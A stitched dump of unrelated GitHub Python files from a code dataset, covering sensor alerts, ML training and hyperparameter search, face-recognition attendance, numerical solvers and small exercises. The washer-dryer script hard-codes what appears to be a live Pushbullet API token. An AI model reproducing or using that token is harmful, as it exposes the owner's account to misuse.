smin:\n smin = sample\n amplitude = smax-smin\n return amplitude\n\nalerter = pushbullet('o.tbcN3E8kIcVJ7z7QYNOg4LovZFLdsF4x')\n\nwhile True:\n samples = np.append(samples,getNoise())\n if len(samples) > SAMPLE_SIZE:\n samples = np.delete(samples,0)\n moving_average = np.mean(samples)\n #print(moving_average)\n \n if moving_average > THRESHOLD and state is washer_dryer_state.OFF: # if the washer is on change the state\n state = washer_dryer_state.ON\n #alert user the washer is on\n alerter.send_alert('washer-dryer on!')\n #print('Washer On!')\n elif moving_average < THRESHOLD and state is washer_dryer_state.ON: # if the state is on but it turned off then switch the state and alert the user\n state = washer_dryer_state.OFF\n #print('Washer Off!')\n alerter.send_alert('washer-dryer finished!')\n\n","repo_name":"PrateekHumane/washer_dryer_alert","sub_path":"washer_dryer_alert.py","file_name":"washer_dryer_alert.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25159571812","text":"import argparse\nimport os\n\nimport jinja2\n\nfrom usbgen import usb\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"input\", help=\"input jinja template\")\n parser.add_argument(\"-o\", \"--output\", help=\"output file\")\n args = parser.parse_args()\n\n path, filename = os.path.split(args.input)\n template = jinja2.Environment(\n loader=jinja2.FileSystemLoader(path or './'),\n keep_trailing_newline=True,\n ).get_template(filename)\n\n template.globals['usb'] = usb\n\n output = template.render()\n\n if args.output is not None:\n outputf = open(args.output, \"w\")\n outputf.write(output)\n outputf.close()\n else:\n print(output)\n","repo_name":"domenipavec/usbgen","sub_path":"usbgen/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33735453213","text":"from numpy.random import seed\nimport GPyOpt\nimport os\nimport string\nimport multiprocessing\nimport numpy as np\nimport json\nimport argparse\n\nclass NumPyArangeEncoder(json.JSONEncoder):\n def default(self, obj):\n if isinstance(obj, np.int64):\n return int(obj)\n if isinstance(obj, np.float64):\n return float(obj)\n if isinstance(obj, np.int32):\n return int(obj)\n if isinstance(obj, np.float32):\n return float(obj)\n if isinstance(obj, np.ndarray):\n return obj.tolist() # or map(int, obj)\n return json.JSONEncoder.default(self, obj)\n\n\n# Global variables\nopt_cmd = string.Template(\"kgcn --config ${config} train ${args}\")\ndomain = [\n {'name': 'num_gcn_layer', 'type': 'discrete', 'domain': (0, 1, 2, 3, 4), \"data_type\": \"int\"},\n {'name': 'layer_dim0', 'type': 'continuous', 'domain': (0.5, 3)},\n {'name': 'layer_dim1', 'type': 'continuous', 'domain': (0.5, 3)},\n {'name': 'layer_dim2', 'type': 'continuous', 'domain': (0.5, 3)},\n {'name': 'layer_dim3', 'type': 'continuous', 'domain': (0.5, 3)},\n {'name': 'add_dense0', 'type': 'discrete', 'domain': (0, 1), \"data_type\": \"int\"},\n {'name': 'add_dense1', 'type': 'discrete', 'domain': (0, 1), \"data_type\": \"int\"},\n {'name': 'add_dense2', 'type': 'discrete', 'domain': (0, 1), \"data_type\": \"int\"},\n {'name': 'add_dense3', 'type': 'discrete', 'domain': (0, 1), \"data_type\": \"int\"},\n {'name': 'num_dense_layer', 'type': 'discrete', 'domain': (0, 1, 2), \"data_type\": \"int\"},\n {'name': 'layer_dense_dim0', 'type': 'continuous', 'domain': (0.5, 3)},\n {'name': 'layer_dense_dim1', 'type': 'continuous', 'domain': (0.5, 3)},\n {'name': 'learning_rate', 'type': 'continuous', 'domain': (0, 0.001)},\n {'name': 'batch_size', 'type': 'discrete', 'domain': (10, 50, 100), \"data_type\": \"int\"},\n {'name': 'dropout_rate', 'type': 'continuous', 'domain': (0, 0.9)},\n ]\nseed(123)\nopt_path = None\nopt_arg = \"\"\nconfig = None\ncounter = 0\n# multiprocess is not supported\nbatch_size = 1\nnum_cores = 1\n#\n\n\ndef save_json(path, obj):\n print(\"[SAVE] \", path)\n with open(path, \"w\") as fp:\n json.dump(obj, fp, indent=4, cls=NumPyArangeEncoder)\n\n\ndef load_json(path):\n print(\"[LOAD] \", path)\n with open(path, 'r') as fp:\n obj = json.load(fp)\n return obj\n\n\ndef update_config(path, config, fid, key):\n if key in config:\n config[key] = os.path.join(path, os.path.basename(config[key]))\n\n\ndef make_config(path, config, fid):\n config[\"param\"] = os.path.join(path, \"param.json\")\n config[\"save_info_valid\"] = os.path.join(path, \"result.json\")\n config[\"save_model\"] = os.path.join(path, f\"model.{str(fid)}.ckpt\")\n config[\"load_model\"] = os.path.join(path, f\"model.{str(fid)}.ckpt\")\n config[\"save_model_path\"] = path\n ###\n config[\"plot_path\"] = path\n update_config(path, config, fid, \"save_info_train\")\n update_config(path, config, fid, \"save_info_test\")\n update_config(path, config, fid, \"save_result_train\")\n update_config(path, config, fid, \"save_result_test\")\n update_config(path, config, fid, \"save_result_valid\")\n ###\n return config\n\n\ndef fx(x):\n # worker=multiprocessing.current_process()._identity\n global counter\n global config\n fid = counter\n counter += 1\n\n # build config\n config = config\n opt_config_path = os.path.join(opt_path, f\"config.{str(fid)}.json\")\n path = os.path.join(opt_path, f\"trial{fid:03d}\")\n opt_result_path = os.path.join(path, \"result.json\")\n os.makedirs(path, exist_ok=True)\n # save config and save parameters\n config = make_config(path, config, fid)\n param = {}\n for i, el in enumerate(domain):\n param[el[\"name\"]] = x[0, i]\n if el[\"name\"] in config:\n print(el[\"name\"], \"<=\", x[0, i])\n if \"data_type\" in el and el[\"data_type\"] == \"int\":\n config[el[\"name\"]] = int(x[0, i])\n else:\n config[el[\"name\"]] = x[0, i]\n save_json(opt_config_path, config)\n save_json(config[\"param\"], param)\n\n # exec command\n context = {\"config\": opt_config_path, \"args\": opt_arg}\n cmd = opt_cmd.substitute(context)\n print(\"cmd:\", cmd)\n os.system(cmd)\n\n # get result\n result = load_json(opt_result_path)\n\n return result[\"validation_cost\"]\n\n\ndef main():\n global opt_path\n global config\n global opt_arg\n global domain\n parser = argparse.ArgumentParser()\n parser.add_argument('--config', type=str, default=None, nargs='?', required=True,\n help='config json file')\n parser.add_argument('--max_itr', type=int, default=3,\n help='maximum iteration')\n parser.add_argument('--opt_path', type=str, default=\"opt/\",\n help='path')\n parser.add_argument('--domain', type=str, default=None,\n help='domain file')\n parser.add_argument('--gpu', type=str, default=None,\n help='[kgcn arg]')\n parser.add_argument('--cpu', action='store_true',\n help='[kgcn arg]')\n args = parser.parse_args()\n\n config = load_json(args.config)\n\n opt_arg += f\" --gpu {args.gpu}\" if args.gpu else \"\"\n opt_arg += f\" --cpu\" if args.cpu else \"\"\n\n print(\"... preparing optimization\")\n # make directory\n opt_path = args.opt_path\n os.makedirs(opt_path, exist_ok=True)\n # load domain\n if args.domain is not None:\n domain = load_json(args.domain)\n print(\"... starting optimization\")\n opt = GPyOpt.methods.BayesianOptimization(f=fx,\n domain=domain,\n batch_size=batch_size,\n num_cores=num_cores)\n opt.run_optimization(max_iter=args.max_itr)\n\n print(\"... saving optimization result\")\n n = opt.X.shape[0]\n result = []\n for i in range(n):\n param = {}\n for j, el in enumerate(domain):\n param[el[\"name\"]] = opt.X[i, j]\n y = opt.Y[i, 0]\n result.append({\"param\": param, \"cost\": y})\n out_result_path = os.path.join(opt_path, \"opt_result.json\")\n save_json(out_result_path, result)\n opt_index = np.argmin(opt.Y[:, 0])\n\n # save optimized parameters\n print(\"... saving optimized parameters\")\n param = {}\n for j, el in enumerate(domain):\n param[el[\"name\"]] = opt.x_opt[j]\n print(f\"optimized parapeter: {param}\"\n f\"cost: {opt.fx_opt}\"\n f\"index: {opt_index}\")\n param[\"opt_index\"] = int(opt_index)\n out_path = os.path.join(opt_path, \"opt_param.json\")\n save_json(out_path, param)\n\n # save optimized config\n print(\"... saving config\")\n fid=int(opt_index)\n path = os.path.join(opt_path, f\"trial{fid:03d}\")\n config[\"load_model\"] = os.path.join(path, f\"model.best.ckpt\")\n opt_config_path = os.path.join(opt_path, f\"opt_config.json\")\n save_json(opt_config_path, config)\n\nif __name__ == '__main__':\n main()\n","repo_name":"clinfo/kGCN","sub_path":"opt_hyperparam.py","file_name":"opt_hyperparam.py","file_ext":"py","file_size_in_byte":7008,"program_lang":"python","lang":"en","doc_type":"code","stars":106,"dataset":"github-code","pt":"72"} +{"seq_id":"70528027434","text":"\"\"\"\n\nImplement a function reverse which reverses a null-terminated string.\n\n\n\"\"\"\n\n\nimport unittest\n\n\ndef reverse_recursion(st):\n if st != \"\":\n return st[-1:] + reverse_recursion(st[:-1])\n else:\n return \"\"\n\n\ndef reverse_st(st):\n return st[::-1]\n\n\n\n\nclass TEST(unittest.TestCase):\n\n TEST_DATA = [\n ['test', 'tset'],\n ['tsukamoto keisuke', 'ekusiek otomakust'],\n ['', ''],\n [' ', ' ']\n ]\n\n def test_both_reverse(self):\n for s, expected in self.TEST_DATA:\n self.assertEqual(reverse_recursion(s), expected)\n self.assertEqual(reverse_st(s), expected)\n\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"garigari-kun/til","sub_path":"src/textbooks/ctci/ch1/1-2.py","file_name":"1-2.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39801688352","text":"import os\nimport tempfile\nimport pytest\nimport unittest\nfrom unittest.mock import MagicMock\nfrom PIL import Image\nfrom application.gui.media_viewer_fullscreen import MediaViewerGUI\nimport unittest.mock\n\n@pytest.fixture\ndef sample_media():\n with tempfile.TemporaryDirectory() as tmpdir:\n image_file = os.path.join(tmpdir, \"image.jpg\")\n\n with Image.new(\"RGB\", (10, 10)) as img:\n img.save(image_file)\n\n yield tmpdir\n\n@pytest.fixture\ndef media_viewer(sample_media):\n with unittest.mock.patch(\"tkinter.Tk.mainloop\"):\n viewer = MediaViewerGUI(sample_media, image_time=0.5)\n yield viewer\n viewer.exit_program(None)\n\ndef test_init(media_viewer):\n assert media_viewer is not None\n assert media_viewer.window_open\n\n#def test_exit_program(media_viewer):\n# with unittest.mock.patch.object(media_viewer, \"exit_program\", wraps=media_viewer.exit_program) as mock_exit_program:\n# media_viewer.window.event_generate(\"\")\n# media_viewer.window.update()\n# \n# mock_exit_program.assert_called_once()\n\ndef test_show_image(media_viewer, sample_media):\n image_file = os.path.join(sample_media, \"image.jpg\")\n media_viewer.show_image(image_file)\n assert media_viewer.img_object is not None\n\n@pytest.mark.skip(reason=\"Testing video display requires testing the cv2 library, which is out of scope\")\ndef test_show_video(media_viewer):\n pass","repo_name":"sperea/showcase-media-viewer-raspberrypi","sub_path":"application/gui/test_media_viewer_fullscreen.py","file_name":"test_media_viewer_fullscreen.py","file_ext":"py","file_size_in_byte":1414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39139251831","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.cluster import MiniBatchKMeans\nfrom collections import Counter\nimport sys\n\ncrime_df = pd.read_csv('./crime/cleaned_crime_data.csv')\npd.set_option('display.max_columns', None)\n\ncrime_df = crime_df.dropna()\n\ncrime_p1 = crime_df[crime_df['UCR_PART'] == 'Part One']\ncrime_p2 = crime_df[crime_df['UCR_PART'] != 'Part One']\n\nNUM_CLUSTERS = int(sys.argv[1]) or 5000;\n\np1_ratio = int(float(len(crime_p1.index)) / float((len(crime_p1.index) + len(crime_p2.index))) * NUM_CLUSTERS);\np2_ratio = NUM_CLUSTERS - p1_ratio;\n\ndef generate_cluster(df, num, name):\n kmeans = MiniBatchKMeans(n_clusters=num).fit(zip(df.Long, df.Lat))\n centroids = kmeans.cluster_centers_\n counts = dict(Counter(kmeans.labels_)).values()\n lng = []\n lat = []\n for i in centroids:\n lng.append(i[0])\n lat.append(i[1])\n cluster_df = pd.DataFrame(zip(lng, lat, counts), columns = ['Long', 'Lat', 'Size'])\n\n print(cluster_df.head())\n print(cluster_df.dtypes)\n cluster_df.to_csv('./crime/clustered_crime_data_%s_%d.csv' % (name, NUM_CLUSTERS), index=False)\n\ngenerate_cluster(crime_p1, p1_ratio, 'p1')\ngenerate_cluster(crime_p2, p2_ratio, 'p2')\n","repo_name":"meguna/boston-crime","sub_path":"data/cluster_crime.py","file_name":"cluster_crime.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70051339432","text":"import cv2\nimport numpy as np\nimport face_recognition\nfrom datetime import datetime\nimport pandas as pd\n\n\ndef mark_attendance(name1):\n with open('staticFiles/Attendance.csv', 'r+') as f:\n my_data_list = f.readlines()\n name_list = []\n for line in my_data_list:\n entry = line.split(',')\n name_list.append(entry[0])\n if name1 not in name_list:\n now = datetime.now()\n dt_string = now.strftime('%H:%M:%S')\n dt_string_dt = now.date()\n f.writelines(f'\\n{name1},{dt_string},{dt_string_dt}')\n\n\ndef main_function(path):\n encoding = 'student_encodings.csv'\n encodings = pd.read_csv(encoding)\n encodings = encodings.drop('Unnamed: 0', axis=1)\n encode = encodings.values.tolist()\n\n name = 'student_names.csv'\n names = pd.read_csv(name)\n names = names.drop('Unnamed: 0', axis=1)\n class_names = names.to_numpy()\n\n img = cv2.imread(path)\n img_s = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n marked = []\n faces_cur_frame = face_recognition.face_locations(img_s)\n encodes_cur_frame = face_recognition.face_encodings(img_s, faces_cur_frame)\n for encodeFace, faceLoc in zip(encodes_cur_frame, faces_cur_frame):\n matches = face_recognition.compare_faces(encode, encodeFace)\n face_dis = face_recognition.face_distance(encode, encodeFace)\n\n match_index = np.argmin(face_dis)\n\n print(class_names[match_index])\n if matches[match_index] > 0.99:\n name = class_names[match_index]\n mark_attendance(name)\n marked.append(name)\n now = datetime.now()\n dt_string = now.strftime('%H:%M:%S')\n dt_string_dt = now.date()\n return marked, dt_string, dt_string_dt\n","repo_name":"divyansh351/AttendanceSystem","sub_path":"mark_attendance.py","file_name":"mark_attendance.py","file_ext":"py","file_size_in_byte":1736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2703868947","text":"import argparse\nimport copy\nimport os\nimport os.path as osp\nimport warnings\nimport random\nimport numpy as np\nimport torch\nimport torch.distributed as dist\nimport time\n\ntic = time.time()\n# 1.14s\n\nimport sys\nsys.path.append('../..')\n\nsys.path.append('../mmcv')\n\nfrom UDL.AutoDL import build_model, getDataSession, ModelDispatcher\nfrom UDL.Basis.auxiliary import init_random_seed, set_random_seed\nfrom mmcv.utils.logging import print_log, create_logger\n# 1.5s\nfrom mmcv.runner import init_dist, find_latest_checkpoint\nfrom mmcv.parallel import MMDataParallel, MMDistributedDataParallel\nfrom mmcv.runner import (DistSamplerSeedHook, EpochBasedRunner,\n Fp16OptimizerHook, OptimizerHook, build_optimizer,\n build_runner, get_dist_info)\n\n\n# 10s\n# from mmdet.datasets import (build_dataloader, build_dataset,\n# replace_ImageToTensor)\n\ndef trainer(cfg, logger,\n distributed=False,\n meta=None):\n\n model, criterion, optimizer, scheduler = build_model(cfg.arch, cfg.task, cfg)\n\n\n if hasattr(model, 'init_weights'):\n model.init_weights()\n\n\n sess = getDataSession(cfg)\n\n if cfg.eval:\n cfg.workflow = [('val', 1)]\n if not any('train' in mode for mode, _ in cfg.workflow):\n cfg.eval = True\n\n # put model on gpus\n if distributed:\n find_unused_parameters = cfg.get('find_unused_parameters', False)\n # Sets the `find_unused_parameters` parameter in\n # torch.nn.parallel.DistributedDataParallel\n model = MMDistributedDataParallel(\n model.cuda(),\n device_ids=[torch.cuda.current_device()],\n broadcast_buffers=False,\n find_unused_parameters=find_unused_parameters)\n else:\n if not hasattr(model, 'train'):\n if isinstance(model.model, dict):\n for name, m in model.model.items():\n model.model[name] = MMDataParallel(m, device_ids=cfg.gpu_ids)\n else:\n model.model = MMDataParallel(model.model, device_ids=cfg.gpu_ids)\n else:\n model = MMDataParallel(model, device_ids=cfg.gpu_ids)\n\n if cfg.get('optimizer', None) is not None:\n optimizer = build_optimizer(model, cfg.optimizer)\n\n if 'runner' not in cfg:\n cfg.runner = {\n 'type': 'EpochBasedRunner',\n 'max_epochs': cfg.epochs # argparser\n }\n warnings.warn(\n 'config is now expected to have a `runner` section, '\n 'please set `runner` in your config.', UserWarning)\n else:\n if 'epochs' in cfg and 'max_iters' not in cfg.runner:\n cfg.runner['max_epochs'] = cfg.epochs\n # assert cfg.epochs == cfg.runner['max_epochs'], print(cfg.epochs, cfg.runner['max_epochs'])\n\n runner = build_runner(\n cfg.runner,\n default_args=dict(\n model=model,\n optimizer=optimizer,\n work_dir=cfg.work_dir,\n logger=logger,\n meta=meta,\n opt_cfg={'print_freq': cfg.print_freq,\n 'accumulated_step': cfg.accumulated_step,\n 'clip_max_norm': cfg.clip_max_norm,\n 'dataset': cfg.dataset,\n 'img_range': cfg.img_range,\n 'metrics': cfg.metrics,\n 'save_fmt': cfg.save_fmt,\n 'mode': cfg.mode,\n 'eval': cfg.eval,\n 'save_dir': cfg.work_dir + \"/results\"}))\n\n # an ugly workaround to make .log and .log.json filenames the same\n # runner.timestamp = timestamp\n\n # fp16 setting\n fp16_cfg = cfg.get('fp16', None)\n if fp16_cfg is not None:\n optimizer_config = Fp16OptimizerHook(\n **cfg.optimizer_config, **fp16_cfg, distributed=distributed)\n elif distributed and 'type' not in cfg.optimizer_config:\n optimizer_config = OptimizerHook(**cfg.optimizer_config)\n else:\n optimizer_config = cfg.get('optimizer_config', None)\n\n ############################################################\n # register training hooks\n ############################################################\n if cfg.get('config', None) is not None:\n '''\n optimizer = dict(type='SGD', lr=0.1, momentum=0.9, weight_decay=0.0001)\n optimizer_config = dict(grad_clip=None)\n lr_config = dict(policy='step', step=[100, 150])\n checkpoint_config = dict(interval=1)\n log_config = dict(\n interval=100,\n hooks=[\n dict(type='TextLoggerHook'),\n # dict(type='TensorboardLoggerHook')\n ])\n '''\n runner.register_training_hooks(\n cfg.lr_config,\n optimizer_config,\n cfg.checkpoint_config,\n cfg.log_config,\n cfg.get('momentum_config', None),\n custom_hooks_config=cfg.get('custom_hooks', None))\n\n elif cfg.get('log_config', None) is None and len(cfg.workflow) and cfg.workflow[0][0] != 'simple_train':\n if cfg.mode == 'nni':\n runner.register_custom_hooks({'type': 'NNIHook', 'priority': 'very_low'})\n if scheduler is not None:\n runner.register_lr_hook(dict(policy=scheduler.__class__.__name__[:-2], step=scheduler.step_size))\n runner.register_checkpoint_hook(\n dict(type='ModelCheckpoint', indicator='loss', save_top_k=cfg.save_top_k, print_freq=cfg.save_print_freq))\n runner.register_optimizer_hook(dict(grad_clip=10)) # ExternOptimizer\n runner.register_timer_hook(dict(type='IterTimerHook'))\n log_config = [dict(type='TextLoggerHook')]\n if cfg.use_tfb:\n log_config.append(dict(type='TensorboardLoggerHook'))\n runner.register_logger_hooks(dict(\n interval=cfg.print_freq,\n hooks=log_config))\n\n else:\n runner.register_checkpoint_hook(dict(type='ModelCheckpoint', indicator='loss'))\n\n if distributed:\n if isinstance(runner, EpochBasedRunner):\n runner.register_hook(DistSamplerSeedHook())\n\n data_loaders = {}\n\n ############################################################\n # load data\n ############################################################\n\n for flow in cfg.workflow:\n mode, _ = flow\n if 'val' in mode:\n # cfg.dataset = cfg.dataset + '_OrigScale_multiExm1.h5'\n # cfg.dataset = cfg.dataset + '_multiExm1.h5'\n\n eval_loader, eval_sampler = sess.get_eval_dataloader(cfg.dataset[mode], distributed)\n\n eval_cfg = cfg.get('evaluation', {})\n eval_cfg['by_epoch'] = cfg.runner['type'] != 'IterBasedRunner'\n from mmcv.runner import EvalHook, DistEvalHook\n eval_hook = DistEvalHook if distributed else EvalHook\n # In this PR (https://github.com/open-mmlab/mmcv/pull/1193), the\n # priority of IterTimerHook has been modified from 'NORMAL' to 'LOW'.\n if mode != 'simple_val':\n runner.register_hook(\n eval_hook(eval_loader, **eval_cfg), priority='LOW')\n\n data_loaders[mode] = eval_loader\n # if len(cfg.workflow) == 0:\n # cfg.workflow.append(('val', 1))\n\n if 'train' in mode:\n train_loader, train_sampler = sess.get_dataloader(cfg.dataset[mode], distributed)\n if cfg.once_epoch:\n train_loader = iter(list(train_loader))\n data_loaders[mode] = train_loader\n\n if len(cfg.workflow) == 0:\n cfg.workflow.append(('simple_train', 1))\n ############################################################\n # load model\n ############################################################\n\n resume_from = None\n if cfg.get('resume_from', None) is None and cfg.get('auto_resume'):\n resume_from = find_latest_checkpoint(cfg.work_dir)\n if resume_from is not None:\n cfg.resume_from = resume_from\n\n # if cfg.get('resume_from', None):\n runner.resume(cfg.resume_from, cfg.resume_mode, cfg.reset_lr, cfg.lr)\n if cfg.get('load_from', None) and cfg.get('resume_from', None) is not None:\n runner.load_checkpoint(cfg.load_from, cfg.resume_mode)\n\n ############################################################\n # run train/val/test\n ############################################################\n runner.run(data_loaders, cfg.workflow)\n\n\ndef main(cfg):\n # init distributed env first, since logger depends on the dist info.\n if cfg.launcher == 'none':\n distributed = False\n else:\n distributed = True\n init_dist(cfg.launcher, **cfg.dist_params)\n # re-set gpu_ids with distributed training mode\n _, world_size = get_dist_info()\n cfg.gpu_ids = range(world_size)\n\n logger, out_dir, model_save_dir, tfb_dir = create_logger(cfg, cfg.experimental_desc, 0)\n cfg.out_dir = cfg.work_dir = model_save_dir\n seed = init_random_seed(cfg.seed)\n print_log(f'Set random seed to {seed}', logger=logger)\n\n set_random_seed(seed)\n\n # if cfg.checkpoint_config is not None:\n # # save mmdet version, config file content and class names in\n # # checkpoints as meta data\n # cfg.checkpoint_config.meta = dict(\n # mmdet_version=__version__ + get_git_hash()[:7],\n # CLASSES=datasets[0].CLASSES)\n # add an attribute for visualization convenience\n\n trainer(\n cfg,\n logger,\n distributed=distributed,\n meta={})\n","repo_name":"liangjiandeng/DLPan-Toolbox","sub_path":"01-DL-toolbox(Pytorch)/UDL/AutoDL/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":9523,"program_lang":"python","lang":"en","doc_type":"code","stars":111,"dataset":"github-code","pt":"72"} +{"seq_id":"69813798634","text":"import sys; sys.setrecursionlimit(100000)\ns= input()\nn= len(s)\n\n\ndef cal(lo,hi):\n if lo>hi:\n return ''\n if s[lo]=='(':\n for i in range(lo+1,hi+1):\n if s[i]==')':\n if i+1=0.01): \r\n key=1\r\n\r\nif(key==1):\r\n print('solution:',x,'The required accuracy is not reached after ',count,' iterations')\r\nelse:\r\n print('solution:',x,'iterations=',count)","repo_name":"nabendu96/Assignment_1","sub_path":"jacobi.py","file_name":"jacobi.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22874583689","text":"\"\"\"Implements ModelNormalGibbs.\"\"\"\n\nimport numpy as _nmp\nimport numpy.random as _rnd\n\nimport eQTLseq.utils as _utils\n\n\nclass ModelNormalVB(object):\n \"\"\"A normal model estimated using variational Bayes.\"\"\"\n\n def __init__(self, **args):\n \"\"\"TODO.\"\"\"\n n_genes, n_markers = args['n_genes'], args['n_markers']\n\n # initial conditions\n self.tau, self.tau_var = _nmp.ones(n_genes), _nmp.ones(n_genes)\n self.eta, self.eta_var = _nmp.ones(n_markers), _nmp.ones(n_markers)\n self.zeta, self.zeta_var = _nmp.ones((n_genes, n_markers)), _nmp.ones((n_genes, n_markers))\n self.beta, self.beta_var = _rnd.randn(n_genes, n_markers), _rnd.randn(n_genes, n_markers)\n\n self.idxs_markers = _nmp.ones(n_markers, dtype='bool')\n self.idxs_genes = _nmp.ones(n_genes, dtype='bool')\n\n def update(self, itr, **args):\n \"\"\"TODO.\"\"\"\n YTY, GTG, GTY = args['YTY'], args['GTG'], args['GTY']\n beta_thr, s2_lims = args['beta_thr'], args['s2_lims']\n\n # identify irrelevant genes and markers and exclude them\n idxs = (_nmp.abs(self.beta) > beta_thr) & (self.zeta * self.eta * self.tau[:, None] < 1 / s2_lims[0])\n idxs[[0, 1], [0, 1]] = True # just a precaution\n self.idxs_markers = _nmp.any(idxs, 0)\n self.idxs_genes = _nmp.any(idxs, 1)\n\n YTY = YTY[self.idxs_genes]\n GTG = GTG[:, self.idxs_markers][self.idxs_markers, :]\n GTY = GTY[self.idxs_markers, :][:, self.idxs_genes]\n\n zeta = self.zeta[self.idxs_genes, :][:, self.idxs_markers]\n eta = self.eta[self.idxs_markers]\n\n # sample beta and tau\n beta, beta_var, tau, tau_var = _update_beta_tau(YTY, GTG, GTY, zeta, eta, args['n_samples'], s2_lims)\n\n self.beta[_nmp.ix_(self.idxs_genes, self.idxs_markers)] = beta\n self.beta_var[_nmp.ix_(self.idxs_genes, self.idxs_markers)] = beta_var\n\n self.tau[self.idxs_genes] = tau\n self.tau_var[self.idxs_genes] = tau_var\n\n # sample eta and zeta\n self.zeta, self.zeta_var = _update_zeta(self.beta, self.beta_var, self.tau, self.eta)\n self.zeta = _nmp.clip(self.zeta, 1 / s2_lims[1], 1 / s2_lims[0])\n\n self.eta, self.eta_var = _update_eta(self.beta, self.beta_var, self.tau, self.zeta)\n self.eta = _nmp.clip(self.eta, 1 / s2_lims[1], 1 / s2_lims[0])\n\n def get_estimates(self, **args):\n \"\"\"TODO.\"\"\"\n return {\n 'tau': self.tau, 'tau_var': self.tau_var,\n 'zeta': self.zeta, 'zeta_var': self.zeta_var,\n 'eta': self.eta, 'eta_var': self.eta_var,\n 'beta': self.beta, 'beta_var': self.beta_var\n }\n\n def get_state(self, **args):\n \"\"\"TODO.\"\"\"\n return _nmp.sqrt((self.beta**2).sum())\n\n\ndef _update_beta_tau(YTY, GTG, GTY, zeta, eta, n_samples, s2_lims):\n \"\"\"TODO.\"\"\"\n _, n_markers = zeta.shape\n\n # update tau\n shape = 0.5 * (n_samples + n_markers)\n rate = 0.5 * YTY\n tau = shape / rate\n tau_var = shape / rate**2\n tau = _nmp.clip(tau, 1 / s2_lims[1], 1 / s2_lims[0])\n\n # sample beta\n A = GTG + zeta[:, :, None] * _nmp.diag(eta)\n beta = _utils.solve_chol_many(A, GTY.T)\n beta_var = rate[:, None] / (shape - 1) / _nmp.diagonal(A, axis1=1, axis2=2) # ??????????\n\n # S = _nmp.linalg.inv(A)\n # beta = (S * GTY.T[:, :, None]).sum(1)\n # beta_var = rate[:, None] / (shape - 1) * _nmp.diagonal(S, axis1=1, axis2=2)\n\n ##\n return beta, beta_var, tau, tau_var\n\n\ndef _update_zeta(beta, beta_var, tau, eta):\n \"\"\"TODO.\"\"\"\n # sample zeta\n shape = 0.5\n rate = 0.5 * eta * tau[:, None] * (beta**2 + beta_var)\n zeta = shape / rate\n zeta_var = shape / rate**2\n\n ##\n return zeta, zeta_var\n\n\ndef _update_eta(beta, beta_var, tau, zeta):\n \"\"\"TODO.\"\"\"\n n_genes, _ = zeta.shape\n\n # sample zeta\n shape = 0.5 * n_genes\n rate = 0.5 * (zeta * tau[:, None] * (beta**2 + beta_var)).sum(0)\n eta = shape / rate\n eta_var = shape / rate**2\n\n ##\n return eta, eta_var\n","repo_name":"dvav/eQTLseq","sub_path":"tmp/ModelNormalVB.py","file_name":"ModelNormalVB.py","file_ext":"py","file_size_in_byte":3997,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"31502392848","text":"\r\nwhile True:\r\n try:\r\n age = int(input(\"tell your age or year of birth \"))\r\n age_prediction = int(input(\"predict your age for the year \"))\r\n\r\n if age < 100:\r\n year = 2019 + (100 - age)\r\n print(\"you will be of 100 at \", year)\r\n if age_prediction > (year-100):\r\n pridic_age = age_prediction - (year - 100)\r\n print(f\"age at {age_prediction} is \", pridic_age)\r\n else:\r\n print(age_predicton + \" is a wrong choice\")\r\n\r\n elif age > 1920 and age < 2019:\r\n year = age + 100\r\n print(\"you will of 100 at \", year)\r\n if age_prediction > (year - 100):\r\n pridic_age = age_prediction - (year - 100)\r\n print(f\"age at {age_prediction} is \", pridic_age)\r\n\r\n elif age > 1890 and age < 1920:\r\n print(\"your age is above 100\")\r\n\r\n elif age > 2019:\r\n print(\"you haven't born yet\")\r\n\r\n else:\r\n print(\"you are not of this world.\")\r\n\r\n except Exception as e:\r\n print(e)","repo_name":"mitalshivam1789/python","sub_path":"practice_test_1.py","file_name":"practice_test_1.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33346210310","text":"# 셋 타입 - 중복이 없는 데이터 관리 구조\nnumber_list = [1, 1, 1, 2, 2, 2, 3, 3, 3]\nnumber_set = {1, 1, 1, 2, 2, 2, 3, 3, 3}\nprint(number_list, number_set)\n\n# 특정 부분만 추출해서 고르거나(index, indexing) 범위 선택(slice, slicing)이 '불가'하다\n# print(number_set[0])\n# print(number_set[0:1])\n\n# 리스트, 튜플, 문자열의 변환이 가능하다.\nbasket_list = ['apple', 'apple', 'banana', 'banana', 'coconut']\nbasket_set = set(basket_list)\nprint(basket_set)\n\ntext = \"aaabbbcccddd\"\ntext_set = set(text)\nprint(text_set)","repo_name":"spencer-park/icbanq-python-beginner","sub_path":"Day02/06_set_type.py","file_name":"06_set_type.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26817983895","text":"\"\"\" CI Settings\n\"\"\"\nfrom .settings import *\n\n# Override Defender and Django Simlpe Captcha settings to allow for automatic\n# regression testing.\nDEFENDER_LOGIN_FAILURE_LIMIT = 1000\nCAPTCHA_TEST_MODE = True\n\nSSL_CERTIFICATES_DIR = 